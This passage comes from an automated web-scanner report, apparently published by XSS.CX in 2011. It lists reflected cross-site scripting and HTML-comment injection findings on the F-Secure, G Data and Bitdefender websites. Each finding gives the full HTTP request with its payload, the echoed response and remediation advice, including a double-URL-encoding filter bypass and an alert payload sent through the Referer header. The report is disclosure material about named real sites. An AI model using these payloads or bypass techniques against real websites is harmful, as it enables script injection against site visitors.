Cookie: fs_af=0; s_vnum=1321979166309%26vn%3D1; s_prop14=1st visit; s_cpmstack=%5B%5B'Referring%2520Domains'%2C'1319387166312'%5D%5D; s_vi=[CS]v1|2752200F851D39B0-6000012900208E42[CE]; s_prop_14=Referring%20Domains; js_user_locale=en_GLOBAL; s_cc=true; s_ppv=50; s_var_3=browse; s_invisit=true; s_nr=1319387753449-New; s_pv=home%3Aglobal%3Aen%3Aprotection%3Ainternet%20security%3Aoverview; s_sq=fsecure%3D%2526pid%253Dhome%25253Aglobal%25253Aen%25253Aprotection%25253Ainternet%252520security%25253Aoverview%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.f-secure.com%25252Fen%25252Fweb%25252Fhome_global%25252Fnews-info%25252Fproduct-news-offers%25252Fview%25252Fstory%25252F463302%25252FF-Secure%252525%2526ot%253DA; country=US

Response

HTTP/1.1 200 OK
Server: Apache
ETag: 3a8dec73
Content-Type: text/html;charset=UTF-8
Content-Length: 65894
Date: Sun, 23 Oct 2011 16:36:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: country=US; path=/; domain=f-secure.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta
...[SNIP]...
ecure.com/en/web/home_global/news-info/product-news-offers/view/-/story/?p_p_id=articlereading_WAR_weblatestcontent&p_p_lifecycle=2&p_p_cacheability=cacheLevelPage&_articlereading_WAR_weblatestcontent_91193-->0fa78608273=1&_articlereading_WAR_weblatestcontent_articleId=463302";<c:choose>
...[SNIP]...

1.107. http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91771/Parenting%20the%20digital%20natives [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.f-secure.com
Path:	/en/web/home_global/news-info/security-stories/view/story/91771/Parenting%20the%20digital%20natives

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d08dd-->9a57a6a40cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/web/home_global/news-info/security-stories/view/story/91771/Parenting%20the%20digital%20natives?d08dd-->9a57a6a40cd=1 HTTP/1.1
Host: www.f-secure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1321979166309%26vn%3D1; s_prop14=1st visit; s_cpmstack=%5B%5B'Referring%2520Domains'%2C'1319387166312'%5D%5D; s_vi=[CS]v1|2752200F851D39B0-6000012900208E42[CE]; fs_af=0; js_user_locale=en_GLOBAL; s_cc=true; country=US; s_ppv=41; s_var_3=browse; s_invisit=true; s_nr=1319387935730-New; s_pv=home%3Aglobal%3Aen%3Anews%3Asecurity%20stories%3Aarticle; s_prop_14=Did%20not%20bounce; s_sq=fsecure%3D%2526pid%253Dhome%25253Aglobal%25253Aen%25253Anews%25253Asecurity%252520stories%25253Aarticle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.f-secure.com%25252Fen%25252Fweb%25252Fhome_global%25252Fnews-info%25252Fsecurity-stories%25252Fview%25252Fstory%25252F91771%25252FParenting%25252520t%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
ETag: 8f9a85e7
Content-Type: text/html;charset=UTF-8
Content-Length: 67783
Date: Sun, 23 Oct 2011 16:39:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: country=US; path=/; domain=f-secure.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta
...[SNIP]...
f-secure.com/en/web/home_global/news-info/security-stories/view/-/story/?p_p_id=articlereading_WAR_weblatestcontent&p_p_lifecycle=2&p_p_cacheability=cacheLevelPage&_articlereading_WAR_weblatestcontent_d08dd-->9a57a6a40cd=1&_articlereading_WAR_weblatestcontent_articleId=91771";<c:choose>
...[SNIP]...

1.108. http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.f-secure.com
Path:	/en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 67238-->b40d34bef0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping?67238-->b40d34bef0d=1 HTTP/1.1
Host: www.f-secure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.f-secure.com/en/web/home_global/news/security-stories
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1321979166309%26vn%3D1; s_prop14=1st visit; s_cpmstack=%5B%5B'Referring%2520Domains'%2C'1319387166312'%5D%5D; s_vi=[CS]v1|2752200F851D39B0-6000012900208E42[CE]; fs_af=0; js_user_locale=en_GLOBAL; country=US; s_cc=true; s_ppv=52; s_var_3=browse; s_invisit=true; s_nr=1319387931067-New; s_pv=home%3Aglobal%3Aen%3Anews%3Asecurity%20stories; s_prop_14=Did%20not%20bounce; s_sq=fsecure%3D%2526pid%253Dhome%25253Aglobal%25253Aen%25253Anews%25253Asecurity%252520stories%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.f-secure.com%25252Fen%25252Fweb%25252Fhome_global%25252Fnews-info%25252Fsecurity-stories%25252Fview%25252Fstory%25252F91782%25252FSafer%25252520onlin%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
ETag: 784478
Content-Type: text/html;charset=UTF-8
Content-Length: 66731
Date: Sun, 23 Oct 2011 16:39:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: country=US; path=/; domain=f-secure.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta
...[SNIP]...
f-secure.com/en/web/home_global/news-info/security-stories/view/-/story/?p_p_id=articlereading_WAR_weblatestcontent&p_p_lifecycle=2&p_p_cacheability=cacheLevelPage&_articlereading_WAR_weblatestcontent_67238-->b40d34bef0d=1&_articlereading_WAR_weblatestcontent_articleId=91782";<c:choose>
...[SNIP]...

1.109. http://www.gdatasoftware.co.uk/online-shop/anti-virus-produkte/shop/23-private-user/1594-g-data-totalcare-2012.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gdatasoftware.co.uk
Path:	/online-shop/anti-virus-produkte/shop/23-private-user/1594-g-data-totalcare-2012.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c125c%253c%252fscript%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e22c05e6234 was submitted in the REST URL parameter 4. This input was echoed as c125c</script><x style=x:expression(alert(1))>22c05e6234 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /online-shop/anti-virus-produkte/shop/c125c%253c%252fscript%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e22c05e6234/1594-g-data-totalcare-2012.html HTTP/1.1
Host: www.gdatasoftware.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gdatasoftware.co.uk/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=fb2bc7e9411fd949462370458ef664c7; __utma=3253734.1808878171.1319387172.1319387172.1319387172.1; __utmb=3253734.1.10.1319387172; __utmc=3253734; __utmz=3253734.1319387172.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; fe_typo_user=9e47734d193c7c01b4e215dc8b650e73

Response

HTTP/1.0 200 OK
Date: Sun, 23 Oct 2011 16:30:05 GMT
Server: Apache/2
Set-Cookie: fe_typo_user=af0a0cc738e2ed29558b0e61e76b6e1a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.gdata.de
X-Cache-Lookup: MISS from www.gdata.de:80
Via: 1.1 www.gdata.de:80 (squid)
Connection: close

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <m
...[SNIP]...
ddIgnoredOrganic("gdata.de");
   pageTracker._addIgnoredRef("gdata.de");
   pageTracker._addIgnoredRef(" www.gdata.de");
   pageTracker._initData();
   pageTracker._trackPageview('/Welcome/Online Shop/Details/c125c</script><x style=x:expression(alert(1))>22c05e6234-/1594 G Data TotalCare 2012');
   </script>
...[SNIP]...

1.110. http://www.bitdefender.com/solutions/total-security.html [Referer HTTP header] previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bitdefender.com
Path:	/solutions/total-security.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2646c'-alert(1)-'3a10773e75d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /solutions/total-security.html HTTP/1.1
Host: www.bitdefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: 2646c'-alert(1)-'3a10773e75d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=petb44jdlc8qgivr4dpdes0761; tagit_session=1; s_vi=[CS]v1|27522009851D3806-400001366000BD01[CE]; _country=us; s_cc=true; s_sq=bitdefendercomdev%3D%2526pid%253Dus%25253Astore%25253Alistsolutions%2526pidt%253D1%2526oid%253Dhttp%25253A//www.bitdefender.com/solutions/total-security.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:33:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _country=us; path=/; domain=.bitdefender.com
Content-Type: text/html
Content-Length: 56114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<script>var referer='2646c'-alert(1)-'3a10773e75d';</script>
...[SNIP]...

Report generated by XSS.CX at Sun Oct 23 12:19:58 CDT 2011.